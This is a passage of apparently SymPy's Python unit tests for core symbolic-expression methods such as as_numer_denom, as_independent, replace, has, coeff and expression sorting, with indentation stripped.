assert isinstance(a.doit(), Integral) is False
assert isinstance(a.doit(integrals=True), Integral) is False
assert isinstance(a.doit(integrals=False), Integral) is True
assert (2*Integral(x, x)).doit() == x**2
def test_attribute_error():
raises(AttributeError, lambda: x.cos())
raises(AttributeError, lambda: x.sin())
raises(AttributeError, lambda: x.exp())
def test_args():
assert (x*y).args in ((x, y), (y, x))
assert (x + y).args in ((x, y), (y, x))
assert (x*y + 1).args in ((x*y, 1), (1, x*y))
assert sin(x*y).args == (x*y,)
assert sin(x*y).args[0] == x*y
assert (x**y).args == (x, y)
assert (x**y).args[0] == x
assert (x**y).args[1] == y
def test_iter_basic_args():
assert list(sin(x*y).iter_basic_args()) == [x*y]
assert list((x**y).iter_basic_args()) == [x, y]
def test_noncommutative_expand_issue658():
A, B, C = symbols('A,B,C', commutative=False)
assert A*B - B*A != 0
assert (A*(A + B)*B).expand() == A**2*B + A*B**2
assert (A*(A + B + C)*B).expand() == A**2*B + A*B**2 + A*C*B
def test_as_numer_denom():
a, b, c = symbols('a, b, c')
assert nan.as_numer_denom() == (nan, 1)
assert oo.as_numer_denom() == (oo, 1)
assert (-oo).as_numer_denom() == (-oo, 1)
assert zoo.as_numer_denom() == (zoo, 1)
assert (-zoo).as_numer_denom() == (zoo, 1)
assert x.as_numer_denom() == (x, 1)
assert (1/x).as_numer_denom() == (1, x)
assert (x/y).as_numer_denom() == (x, y)
assert (x/2).as_numer_denom() == (x, 2)
assert (x*y/z).as_numer_denom() == (x*y, z)
assert (x/(y*z)).as_numer_denom() == (x, y*z)
assert Rational(1, 2).as_numer_denom() == (1, 2)
assert (1/y**2).as_numer_denom() == (1, y**2)
assert (x/y**2).as_numer_denom() == (x, y**2)
assert ((x**2 + 1)/y).as_numer_denom() == (x**2 + 1, y)
assert (x*(y + 1)/y**7).as_numer_denom() == (x*(y + 1), y**7)
assert (x**-2).as_numer_denom() == (1, x**2)
assert (a/x + b/2/x + c/3/x).as_numer_denom() == \
(6*a + 3*b + 2*c, 6*x)
assert (a/x + b/2/x + c/3/y).as_numer_denom() == \
(2*c*x + y*(6*a + 3*b), 6*x*y)
assert (a/x + b/2/x + c/.5/x).as_numer_denom() == \
(2*a + b + 4.0*c, 2*x)
# this should take no more than a few seconds
assert int(log(Add(*[Dummy()/i/x for i in xrange(1, 705)]
).as_numer_denom()[1]/x).n(4)) == 705
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).as_numer_denom() == \
(x + i, 3)
assert (S.Infinity + x/3 + y/4).as_numer_denom() == \
(4*x + 3*y + S.Infinity, 12)
assert (oo*x + zoo*y).as_numer_denom() == \
(zoo*y + oo*x, 1)
A, B, C = symbols('A,B,C', commutative=False)
assert (A*B*C**-1).as_numer_denom() == (A*B*C**-1, 1)
assert (A*B*C**-1/x).as_numer_denom() == (A*B*C**-1, x)
assert (C**-1*A*B).as_numer_denom() == (C**-1*A*B, 1)
assert (C**-1*A*B/x).as_numer_denom() == (C**-1*A*B, x)
assert ((A*B*C)**-1).as_numer_denom() == ((A*B*C)**-1, 1)
assert ((A*B*C)**-1/x).as_numer_denom() == ((A*B*C)**-1, x)
def test_as_independent():
assert (2*x*sin(x) + y + x).as_independent(x) == (y, x + 2*x*sin(x))
assert (2*x*sin(x) + y + x).as_independent(y) == (x + 2*x*sin(x), y)
assert (2*x*sin(x) + y + x).as_independent(x, y) == (0, y + x + 2*x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(x) == (cos(y), x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(y) == (x*sin(x), cos(y))
assert (x*sin(x)*cos(y)).as_independent(x, y) == (1, x*sin(x)*cos(y))
assert (sin(x)).as_independent(x) == (1, sin(x))
assert (sin(x)).as_independent(y) == (sin(x), 1)
assert (2*sin(x)).as_independent(x) == (2, sin(x))
assert (2*sin(x)).as_independent(y) == (2*sin(x), 1)
# issue 1804 = 1766b
n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
assert (n1 + n1*n2).as_independent(n2) == (n1, n1*n2)
assert (n2*n1 + n1*n2).as_independent(n2) == (0, n1*n2 + n2*n1)
assert (n1*n2*n1).as_independent(n2) == (n1, n2*n1)
assert (n1*n2*n1).as_independent(n1) == (1, n1*n2*n1)
assert (3*x).as_independent(x, as_Add=True) == (0, 3*x)
assert (3*x).as_independent(x, as_Add=False) == (3, x)
assert (3 + x).as_independent(x, as_Add=True) == (3, x)
assert (3 + x).as_independent(x, as_Add=False) == (1, 3 + x)
# issue 2380
assert (3*x).as_independent(Symbol) == (3, x)
# issue 2549
assert (n1*x*y).as_independent(x) == (n1*y, x)
assert ((x + n1)*(x - y)).as_independent(x) == (1, (x + n1)*(x - y))
assert ((x + n1)*(x - y)).as_independent(y) == (x + n1, x - y)
assert (DiracDelta(x - n1)*DiracDelta(x - y)).as_independent(x) \
== (1, DiracDelta(x - n1)*DiracDelta(x - y))
assert (x*y*n1*n2*n3).as_independent(n2) == (x*y*n1, n2*n3)
assert (x*y*n1*n2*n3).as_independent(n1) == (x*y, n1*n2*n3)
assert (x*y*n1*n2*n3).as_independent(n3) == (x*y*n1*n2, n3)
assert (DiracDelta(x - n1)*DiracDelta(y - n1)*DiracDelta(x - n2)).as_independent(y) == \
(DiracDelta(x - n1)*DiracDelta(x - n2), DiracDelta(y - n1))
# issue 2685
assert (x + Integral(x, (x, 1, 2))).as_independent(x, strict=True) == \
(Integral(x, (x, 1, 2)), x)
def test_call():
# See the long history of this in issues 1927 and 2006.
raises(TypeError, lambda: sin(x)({ x : 1, sin(x) : 2}))
raises(TypeError, lambda: sin(x)(1))
# No effect as there are no callables
assert sin(x).rcall(1) == sin(x)
assert (1 + sin(x)).rcall(1) == 1 + sin(x)
# Effect in the pressence of callables
l = Lambda(x, 2*x)
assert (l + x).rcall(y) == 2*y + x
assert (x**l).rcall(2) == x**4
# TODO UndefinedFunction does not subclass Expr
#f = Function('f')
#assert (2*f)(x) == 2*f(x)
def test_replace():
f = log(sin(x)) + tan(sin(x**2))
assert f.replace(sin, cos) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin, lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
a = Wild('a')
b = Wild('b')
assert f.replace(sin(a), cos(a)) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin(a), lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
# test exact
assert (2*x).replace(a*x + b, b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, b - a) == 2/x
assert (2*x).replace(a*x + b, lambda a, b: b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, lambda a, b: b - a) == 2/x
g = 2*sin(x**3)
assert g.replace(
lambda expr: expr.is_Number, lambda expr: expr**2) == 4*sin(x**9)
assert cos(x).replace(cos, sin, map=True) == (sin(x), {cos(x): sin(x)})
assert sin(x).replace(cos, sin) == sin(x)
cond, func = lambda x: x.is_Mul, lambda x: 2*x
assert (x*y).replace(cond, func, map=True) == (2*x*y, {x*y: 2*x*y})
assert (x*(1 + x*y)).replace(cond, func, map=True) == \
(2*x*(2*x*y + 1), {x*(2*x*y + 1): 2*x*(2*x*y + 1), x*y: 2*x*y})
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y, map=True) == \
(sin(x), {sin(x): sin(x)/y})
# if not simultaneous then y*sin(x) -> y*sin(x)/y = sin(x) -> sin(x)/y
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y,
simultaneous=False) == sin(x)/y
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e) == O(1, x)
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e,
simultaneous=False) == x**2/2 + O(x**3)
assert (x*(x*y + 3)).replace(lambda x: x.is_Mul, lambda x: 2 + x) == \
x*(x*y + 5) + 2
e = (x*y + 1)*(2*x*y + 1) + 1
assert e.replace(cond, func, map=True) == (
2*((2*x*y + 1)*(4*x*y + 1)) + 1,
{2*x*y: 4*x*y, x*y: 2*x*y, (2*x*y + 1)*(4*x*y + 1):
2*((2*x*y + 1)*(4*x*y + 1))})
assert x.replace(x, y) == y
assert (x + 1).replace(1, 2) == x + 2
def test_find():
expr = (x + y + 2 + sin(3*x))
assert expr.find(lambda u: u.is_Integer) == set([S(2), S(3)])
assert expr.find(lambda u: u.is_Symbol) == set([x, y])
assert expr.find(lambda u: u.is_Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(lambda u: u.is_Symbol, group=True) == {x: 2, y: 1}
assert expr.find(Integer) == set([S(2), S(3)])
assert expr.find(Symbol) == set([x, y])
assert expr.find(Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(Symbol, group=True) == {x: 2, y: 1}
a = Wild('a')
expr = sin(sin(x)) + sin(x) + cos(x) + x
assert expr.find(lambda u: type(u) is sin) == set([sin(x), sin(sin(x))])
assert expr.find(
lambda u: type(u) is sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin(a)) == set([sin(x), sin(sin(x))])
assert expr.find(sin(a), group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin) == set([sin(x), sin(sin(x))])
assert expr.find(sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
def test_count():
expr = (x + y + 2 + sin(3*x))
assert expr.count(lambda u: u.is_Integer) == 2
assert expr.count(lambda u: u.is_Symbol) == 3
assert expr.count(Integer) == 2
assert expr.count(Symbol) == 3
assert expr.count(2) == 1
a = Wild('a')
assert expr.count(sin) == 1
assert expr.count(sin(a)) == 1
assert expr.count(lambda u: type(u) is sin) == 1
def test_has_basics():
f = Function('f')
g = Function('g')
p = Wild('p')
assert sin(x).has(x)
assert sin(x).has(sin)
assert not sin(x).has(y)
assert not sin(x).has(cos)
assert f(x).has(x)
assert f(x).has(f)
assert not f(x).has(y)
assert not f(x).has(g)
assert f(x).diff(x).has(x)
assert f(x).diff(x).has(f)
assert f(x).diff(x).has(Derivative)
assert not f(x).diff(x).has(y)
assert not f(x).diff(x).has(g)
assert not f(x).diff(x).has(sin)
assert (x**2).has(Symbol)
assert not (x**2).has(Wild)
assert (2*p).has(Wild)
assert not x.has()
def test_has_multiple():
f = x**2*y + sin(2**t + log(z))
assert f.has(x)
assert f.has(y)
assert f.has(z)
assert f.has(t)
assert not f.has(u)
assert f.has(x, y, z, t)
assert f.has(x, y, z, t, u)
i = Integer(4400)
assert not i.has(x)
assert (i*x**i).has(x)
assert not (i*y**i).has(x)
assert (i*y**i).has(x, y)
assert not (i*y**i).has(x, z)
def test_has_piecewise():
f = (x*y + 3/y)**(3 + 2)
g = Function('g')
h = Function('h')
p = Piecewise((g(x), x < -1), (1, x <= 1), (f, True))
assert p.has(x)
assert p.has(y)
assert not p.has(z)
assert p.has(1)
assert p.has(3)
assert not p.has(4)
assert p.has(f)
assert p.has(g)
assert not p.has(h)
def test_has_iterative():
A, B, C = symbols('A,B,C', commutative=False)
f = x*gamma(x)*sin(x)*exp(x*y)*A*B*C*cos(x*A*B)
assert f.has(x)
assert f.has(x*y)
assert f.has(x*sin(x))
assert not f.has(x*sin(y))
assert f.has(x*A)
assert f.has(x*A*B)
assert not f.has(x*A*C)
assert f.has(x*A*B*C)
assert not f.has(x*A*C*B)
assert f.has(x*sin(x)*A*B*C)
assert not f.has(x*sin(x)*A*C*B)
assert not f.has(x*sin(y)*A*B*C)
assert f.has(x*gamma(x))
assert not f.has(x + sin(x))
assert (x & y & z).has(x & z)
def test_has_integrals():
f = Integral(x**2 + sin(x*y*z), (x, 0, x + y + z))
assert f.has(x + y)
assert f.has(x + z)
assert f.has(y + z)
assert f.has(x*y)
assert f.has(x*z)
assert f.has(y*z)
assert not f.has(2*x + y)
assert not f.has(2*x*y)
def test_has_tuple():
f = Function('f')
g = Function('g')
h = Function('h')
assert Tuple(x, y).has(x)
assert not Tuple(x, y).has(z)
assert Tuple(f(x), g(x)).has(x)
assert not Tuple(f(x), g(x)).has(y)
assert Tuple(f(x), g(x)).has(f)
assert Tuple(f(x), g(x)).has(f(x))
assert not Tuple(f, g).has(x)
assert Tuple(f, g).has(f)
assert not Tuple(f, g).has(h)
assert Tuple(True).has(True) is True # .has(1) will also be True
def test_has_units():
from sympy.physics.units import m, s
assert (x*m/s).has(x)
assert (x*m/s).has(y, z) is False
def test_has_polys():
poly = Poly(x**2 + x*y*sin(z), x, y, t)
assert poly.has(x)
assert poly.has(x, y, z)
assert poly.has(x, y, z, t)
def test_has_physics():
assert FockState((x, y)).has(x)
def test_as_poly_as_expr():
f = x**2 + 2*x*y
assert f.as_poly().as_expr() == f
assert f.as_poly(x, y).as_expr() == f
assert (f + sin(x)).as_poly(x, y) is None
p = Poly(f, x, y)
assert p.as_poly() == p
def test_nonzero():
assert bool(S.Zero) is False
assert bool(S.One) is True
assert bool(x) is True
assert bool(x + y) is True
assert bool(x - x) is False
assert bool(x*y) is True
assert bool(x*1) is True
assert bool(x*0) is False
def test_is_number():
assert Float(3.14).is_number is True
assert Integer(737).is_number is True
assert Rational(3, 2).is_number is True
assert Rational(8).is_number is True
assert x.is_number is False
assert (2*x).is_number is False
assert (x + y).is_number is False
assert log(2).is_number is True
assert log(x).is_number is False
assert (2 + log(2)).is_number is True
assert (8 + log(2)).is_number is True
assert (2 + log(x)).is_number is False
assert (8 + log(2) + x).is_number is False
assert (1 + x**2/x - x).is_number is True
assert Tuple(Integer(1)).is_number is False
assert Add(2, x).is_number is False
assert Mul(3, 4).is_number is True
assert Pow(log(2), 2).is_number is True
assert oo.is_number is True
g = WildFunction('g')
assert g.is_number is False
assert (2*g).is_number is False
assert (x**2).subs(x, 3).is_number is True
# test extensibility of .is_number
# on subinstances of Basic
class A(Basic):
pass
a = A()
assert a.is_number is False
def test_as_coeff_add():
assert S(2).as_coeff_add() == (2, ())
assert S(3.0).as_coeff_add() == (0, (S(3.0),))
assert S(-3.0).as_coeff_add() == (0, (S(-3.0),))
assert x.as_coeff_add() == (0, (x,))
assert (x - 1).as_coeff_add() == (-1, (x,))
assert (x + 1).as_coeff_add() == (1, (x,))
assert (x + 2).as_coeff_add() == (2, (x,))
assert (x + y).as_coeff_add(y) == (x, (y,))
assert (3*x).as_coeff_add(y) == (3*x, ())
# don't do expansion
e = (x + y)**2
assert e.as_coeff_add(y) == (0, (e,))
def test_as_coeff_mul():
assert S(2).as_coeff_mul() == (2, ())
assert S(3.0).as_coeff_mul() == (1, (S(3.0),))
assert S(-3.0).as_coeff_mul() == (-1, (S(3.0),))
assert x.as_coeff_mul() == (1, (x,))
assert (-x).as_coeff_mul() == (-1, (x,))
assert (2*x).as_coeff_mul() == (2, (x,))
assert (x*y).as_coeff_mul(y) == (x, (y,))
assert (3 + x).as_coeff_mul(y) == (3 + x, ())
# don't do expansion
e = exp(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
e = 2**(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
def test_as_coeff_exponent():
assert (3*x**4).as_coeff_exponent(x) == (3, 4)
assert (2*x**3).as_coeff_exponent(x) == (2, 3)
assert (4*x**2).as_coeff_exponent(x) == (4, 2)
assert (6*x**1).as_coeff_exponent(x) == (6, 1)
assert (3*x**0).as_coeff_exponent(x) == (3, 0)
assert (2*x**0).as_coeff_exponent(x) == (2, 0)
assert (1*x**0).as_coeff_exponent(x) == (1, 0)
assert (0*x**0).as_coeff_exponent(x) == (0, 0)
assert (-1*x**0).as_coeff_exponent(x) == (-1, 0)
assert (-2*x**0).as_coeff_exponent(x) == (-2, 0)
assert (2*x**3 + pi*x**3).as_coeff_exponent(x) == (2 + pi, 3)
assert (x*log(2)/(2*x + pi*x)).as_coeff_exponent(x) == \
(log(2)/(2 + pi), 0)
# 1685
D = Derivative
f = Function('f')
fx = D(f(x), x)
assert fx.as_coeff_exponent(f(x)) == (fx, 0)
def test_extractions():
assert ((x*y)**3).extract_multiplicatively(x**2 * y) == x*y**2
assert ((x*y)**3).extract_multiplicatively(x**4 * y) is None
assert (2*x).extract_multiplicatively(2) == x
assert (2*x).extract_multiplicatively(3) is None
assert (2*x).extract_multiplicatively(-1) is None
assert (Rational(1, 2)*x).extract_multiplicatively(3) == x/6
assert (sqrt(x)).extract_multiplicatively(x) is None
assert (sqrt(x)).extract_multiplicatively(1/x) is None
assert ((x*y)**3).extract_additively(1) is None
assert (x + 1).extract_additively(x) == 1
assert (x + 1).extract_additively(2*x) is None
assert (x + 1).extract_additively(-x) is None
assert (-x + 1).extract_additively(2*x) is None
assert (2*x + 3).extract_additively(x) == x + 3
assert (2*x + 3).extract_additively(2) == 2*x + 1
assert (2*x + 3).extract_additively(3) == 2*x
assert (2*x + 3).extract_additively(-2) is None
assert (2*x + 3).extract_additively(3*x) is None
assert (2*x + 3).extract_additively(2*x) == 3
assert x.extract_additively(0) == x
assert S(2).extract_additively(x) is None
assert S(2.).extract_additively(2) == S.Zero
assert S(2*x + 3).extract_additively(x + 1) == x + 2
assert S(2*x + 3).extract_additively(y + 1) is None
assert S(2*x - 3).extract_additively(x + 1) is None
assert S(2*x - 3).extract_additively(y + z) is None
assert ((a + 1)*x*4 + y).extract_additively(x).expand() == \
4*a*x + 3*x + y
assert ((a + 1)*x*4 + 3*y).extract_additively(x + 2*y).expand() == \
4*a*x + 3*x + y
assert (y*(x + 1)).extract_additively(x + 1) is None
assert ((y + 1)*(x + 1) + 3).extract_additively(x + 1) == \
y*(x + 1) + 3
assert ((x + y)*(x + 1) + x + y + 3).extract_additively(x + y) == \
x*(x + y) + 3
assert (x + y + 2*((x + y)*(x + 1)) + 3).extract_additively((x + y)*(x + 1)) == \
x + y + (x + 1)*(x + y) + 3
assert ((y + 1)*(x + 2*y + 1) + 3).extract_additively(y + 1) == \
(x + 2*y)*(y + 1) + 3
n = Symbol("n", integer=True)
assert (Integer(-3)).could_extract_minus_sign() is True
assert (-n*x + x).could_extract_minus_sign() != \
(n*x - x).could_extract_minus_sign()
assert (x - y).could_extract_minus_sign() != \
(-x + y).could_extract_minus_sign()
assert (1 - x - y).could_extract_minus_sign() is True
assert (1 - x + y).could_extract_minus_sign() is False
assert ((-x - x*y)/y).could_extract_minus_sign() is True
assert (-(x + x*y)/y).could_extract_minus_sign() is True
assert ((x + x*y)/(-y)).could_extract_minus_sign() is True
assert ((x + x*y)/y).could_extract_minus_sign() is False
assert (x*(-x - x**3)).could_extract_minus_sign() is True
assert ((-x - y)/(x + y)).could_extract_minus_sign() is True
# The results of each of these will vary on different machines, e.g.
# the first one might be False and the other (then) is true or vice versa,
# so both are included.
assert ((-x - y)/(x - y)).could_extract_minus_sign() is False or \
((-x - y)/(y - x)).could_extract_minus_sign() is False
assert (x - y).could_extract_minus_sign() is False
assert (-x + y).could_extract_minus_sign() is True
def test_coeff():
assert (x + 1).coeff(x + 1) == 1
assert (3*x).coeff(0) == 0
assert (z*(1 + x)*x**2).coeff(1 + x) == z*x**2
assert (1 + 2*x*x**(1 + x)).coeff(x*x**(1 + x)) == 2
assert (1 + 2*x**(y + z)).coeff(x**(y + z)) == 2
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (3 + 2*x + 4*x**2).coeff(-1) == 0
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (-x/8 + x*y).coeff(x) == -S(1)/8 + y
assert (-x/8 + x*y).coeff(-x) == S(1)/8
assert (4*x).coeff(2*x) == 0
assert (2*x).coeff(2*x) == 1
assert (-oo*x).coeff(x*oo) == -1
n1, n2 = symbols('n1 n2', commutative=False)
assert (n1*n2).coeff(n1) == 1
assert (n1*n2).coeff(n2) == n1
assert (n1*n2 + x*n1).coeff(n1) == 1 # 1*n1*(n2+x)
assert (n2*n1 + x*n1).coeff(n1) == n2 + x
assert (n2*n1 + x*n1**2).coeff(n1) == n2
assert (n1**x).coeff(n1) == 0
assert (n1*n2 + n2*n1).coeff(n1) == 0
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=1) == n2
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=0) == 2
f = Function('f')
assert (2*f(x) + 3*f(x).diff(x)).coeff(f(x)) == 2
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr.coeff(x + y) == 0
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
assert (x + y + 3*z).coeff(1) == x + y
assert (-x + 2*y).coeff(-1) == x
assert (x - 2*y).coeff(-1) == 2*y
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (-x - 2*y).coeff(2) == -y
assert (x + sqrt(2)*x).coeff(sqrt(2)) == x
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (z*(x + y)**2).coeff((x + y)**2) == z
assert (z*(x + y)**2).coeff(x + y) == 0
assert (2 + 2*x + (x + 1)*y).coeff(x + 1) == y
assert (x + 2*y + 3).coeff(1) == x
assert (x + 2*y + 3).coeff(x, 0) == 2*y + 3
assert (x**2 + 2*y + 3*x).coeff(x**2, 0) == 2*y + 3*x
assert x.coeff(0, 0) == 0
assert x.coeff(x, 0) == 0
n, m, o, l = symbols('n m o l', commutative=False)
assert n.coeff(n) == 1
assert y.coeff(n) == 0
assert (3*n).coeff(n) == 3
assert (2 + n).coeff(x*m) == 0
assert (2*x*n*m).coeff(x) == 2*n*m
assert (2 + n).coeff(x*m*n + y) == 0
assert (2*x*n*m).coeff(3*n) == 0
assert (n*m + m*n*m).coeff(n) == 1 + m
assert (n*m + m*n*m).coeff(n, right=True) == m # = (1 + m)*n*m
assert (n*m + m*n).coeff(n) == 0
assert (n*m + o*m*n).coeff(m*n) == o
assert (n*m + o*m*n).coeff(m*n, right=1) == 1
assert (n*m + n*m*n).coeff(n*m, right=1) == 1 + n # = n*m*(n + 1)
def test_coeff2():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff((psi(r).diff(r))) == 2/r
def test_coeff2_0():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff(psi(r).diff(r, 2)) == 1
def test_coeff_expand():
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
def test_integrate():
assert x.integrate(x) == x**2/2
assert x.integrate((x, 0, 1)) == S(1)/2
def test_as_base_exp():
assert x.as_base_exp() == (x, S.One)
assert (x*y*z).as_base_exp() == (x*y*z, S.One)
assert (x + y + z).as_base_exp() == (x + y + z, S.One)
assert ((x + y)**z).as_base_exp() == (x + y, z)
def test_issue1864():
assert hasattr(Mul(x, y), "is_commutative")
assert hasattr(Mul(x, y, evaluate=False), "is_commutative")
assert hasattr(Pow(x, y), "is_commutative")
assert hasattr(Pow(x, y, evaluate=False), "is_commutative")
expr = Mul(Pow(2, 2, evaluate=False), 3, evaluate=False) + 1
assert hasattr(expr, "is_commutative")
def test_action_verbs():
assert nsimplify((1/(exp(3*pi*x/5) + 1))) == \
(1/(exp(3*pi*x/5) + 1)).nsimplify()
assert ratsimp(1/x + 1/y) == (1/x + 1/y).ratsimp()
assert trigsimp(log(x), deep=True) == (log(x)).trigsimp(deep=True)
assert radsimp(1/(2 + sqrt(2))) == (1/(2 + sqrt(2))).radsimp()
assert powsimp(x**y*x**z*y**z, combine='all') == \
(x**y*x**z*y**z).powsimp(combine='all')
assert simplify(x**y*x**z*y**z) == (x**y*x**z*y**z).simplify()
assert together(1/x + 1/y) == (1/x + 1/y).together()
# Not tested because it's deprecated
#assert separate((x*(y*z)**3)**2) == ((x*(y*z)**3)**2).separate()
assert collect(a*x**2 + b*x**2 + a*x - b*x + c, x) == \
(a*x**2 + b*x**2 + a*x - b*x + c).collect(x)
assert apart(y/(y + 2)/(y + 1), y) == (y/(y + 2)/(y + 1)).apart(y)
assert combsimp(y/(x + 2)/(x + 1)) == (y/(x + 2)/(x + 1)).combsimp()
assert factor(x**2 + 5*x + 6) == (x**2 + 5*x + 6).factor()
assert refine(sqrt(x**2)) == sqrt(x**2).refine()
assert cancel((x**2 + 5*x + 6)/(x + 2)) == ((x**2 + 5*x + 6)/(x + 2)).cancel()
def test_as_powers_dict():
assert x.as_powers_dict() == {x: 1}
assert (x**y*z).as_powers_dict() == {x: y, z: 1}
assert Mul(2, 2, evaluate=False).as_powers_dict() == {S(2): S(2)}
assert (x*y).as_powers_dict()[z] == 0
assert (x + y).as_powers_dict()[z] == 0
def test_as_coefficients_dict():
check = [S(1), x, y, x*y, 1]
assert [Add(3*x, 2*x, y, 3).as_coefficients_dict()[i] for i in check] == \
[3, 5, 1, 0, 0]
assert [(3*x*y).as_coefficients_dict()[i] for i in check] == \
[0, 0, 0, 3, 0]
assert (3.0*x*y).as_coefficients_dict()[3.0*x*y] == 1
def test_args_cnc():
A = symbols('A', commutative=False)
assert (x + A).args_cnc() == \
[[], [x + A]]
assert (x + a).args_cnc() == \
[[a + x], []]
assert (x*a).args_cnc() == \
[[a, x], []]
assert (x*y*A*(A + 1)).args_cnc(cset=True) == \
[set([x, y]), [A, 1 + A]]
assert Mul(x, x, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x]), []]
assert Mul(x, x**2, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x, x**2]), []]
raises(ValueError, lambda: Mul(x, x, evaluate=False).args_cnc(cset=True))
assert Mul(x, y, x, evaluate=False).args_cnc() == \
[[x, y, x], []]
# always split -1 from leading number
assert (-1.*x).args_cnc() == [[-1, 1.0, x], []]
def test_new_rawargs():
n = Symbol('n', commutative=False)
a = x + n
assert a.is_commutative is False
assert a._new_rawargs(x).is_commutative
assert a._new_rawargs(x, y).is_commutative
assert a._new_rawargs(x, n).is_commutative is False
assert a._new_rawargs(x, y, n).is_commutative is False
m = x*n
assert m.is_commutative is False
assert m._new_rawargs(x).is_commutative
assert m._new_rawargs(n).is_commutative is False
assert m._new_rawargs(x, y).is_commutative
assert m._new_rawargs(x, n).is_commutative is False
assert m._new_rawargs(x, y, n).is_commutative is False
assert m._new_rawargs(x, n, reeval=False).is_commutative is False
assert m._new_rawargs(S.One) is S.One
def test_2127():
assert Add(evaluate=False) == 0
assert Mul(evaluate=False) == 1
assert Mul(x + y, evaluate=False).is_Add
def test_free_symbols():
# free_symbols should return the free symbols of an object
assert S(1).free_symbols == set()
assert (x).free_symbols == set([x])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert (-Integral(x, (x, 1, y))).free_symbols == set([y])
assert meter.free_symbols == set()
assert (meter**x).free_symbols == set([x])
def test_issue2201():
x = Symbol('x', commutative=False)
assert x*sqrt(2)/sqrt(6) == x*sqrt(3)/3
def test_as_coeff_Mul():
assert Integer(3).as_coeff_Mul() == (Integer(3), Integer(1))
assert Rational(3, 4).as_coeff_Mul() == (Rational(3, 4), Integer(1))
assert Float(5.0).as_coeff_Mul() == (Float(5.0), Integer(1))
assert (Integer(3)*x).as_coeff_Mul() == (Integer(3), x)
assert (Rational(3, 4)*x).as_coeff_Mul() == (Rational(3, 4), x)
assert (Float(5.0)*x).as_coeff_Mul() == (Float(5.0), x)
assert (Integer(3)*x*y).as_coeff_Mul() == (Integer(3), x*y)
assert (Rational(3, 4)*x*y).as_coeff_Mul() == (Rational(3, 4), x*y)
assert (Float(5.0)*x*y).as_coeff_Mul() == (Float(5.0), x*y)
assert (x).as_coeff_Mul() == (S.One, x)
assert (x*y).as_coeff_Mul() == (S.One, x*y)
def test_as_coeff_Add():
assert Integer(3).as_coeff_Add() == (Integer(3), Integer(0))
assert Rational(3, 4).as_coeff_Add() == (Rational(3, 4), Integer(0))
assert Float(5.0).as_coeff_Add() == (Float(5.0), Integer(0))
assert (Integer(3) + x).as_coeff_Add() == (Integer(3), x)
assert (Rational(3, 4) + x).as_coeff_Add() == (Rational(3, 4), x)
assert (Float(5.0) + x).as_coeff_Add() == (Float(5.0), x)
assert (Integer(3) + x + y).as_coeff_Add() == (Integer(3), x + y)
assert (Rational(3, 4) + x + y).as_coeff_Add() == (Rational(3, 4), x + y)
assert (Float(5.0) + x + y).as_coeff_Add() == (Float(5.0), x + y)
assert (x).as_coeff_Add() == (S.Zero, x)
assert (x*y).as_coeff_Add() == (S.Zero, x*y)
def test_expr_sorting():
f, g = symbols('f,g', cls=Function)
exprs = [1/x**2, 1/x, sqrt(sqrt(x)), sqrt(x), x, sqrt(x)**3, x**2]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x, 2*x, 2*x**2, 2*x**3, x**n, 2*x**n, sin(x), sin(x)**n,
sin(x**2), cos(x), cos(x**2), tan(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x + 1, x**2 + x + 1, x**3 + x**2 + x + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [S(4), x - 3*I/2, x + 3*I/2, x - 4*I + 1, x + 4*I + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(x), g(x), exp(x), sin(x), cos(x), factorial(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [Tuple(x, y), Tuple(x, z), Tuple(x, y, z)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[3], [1, 2]]
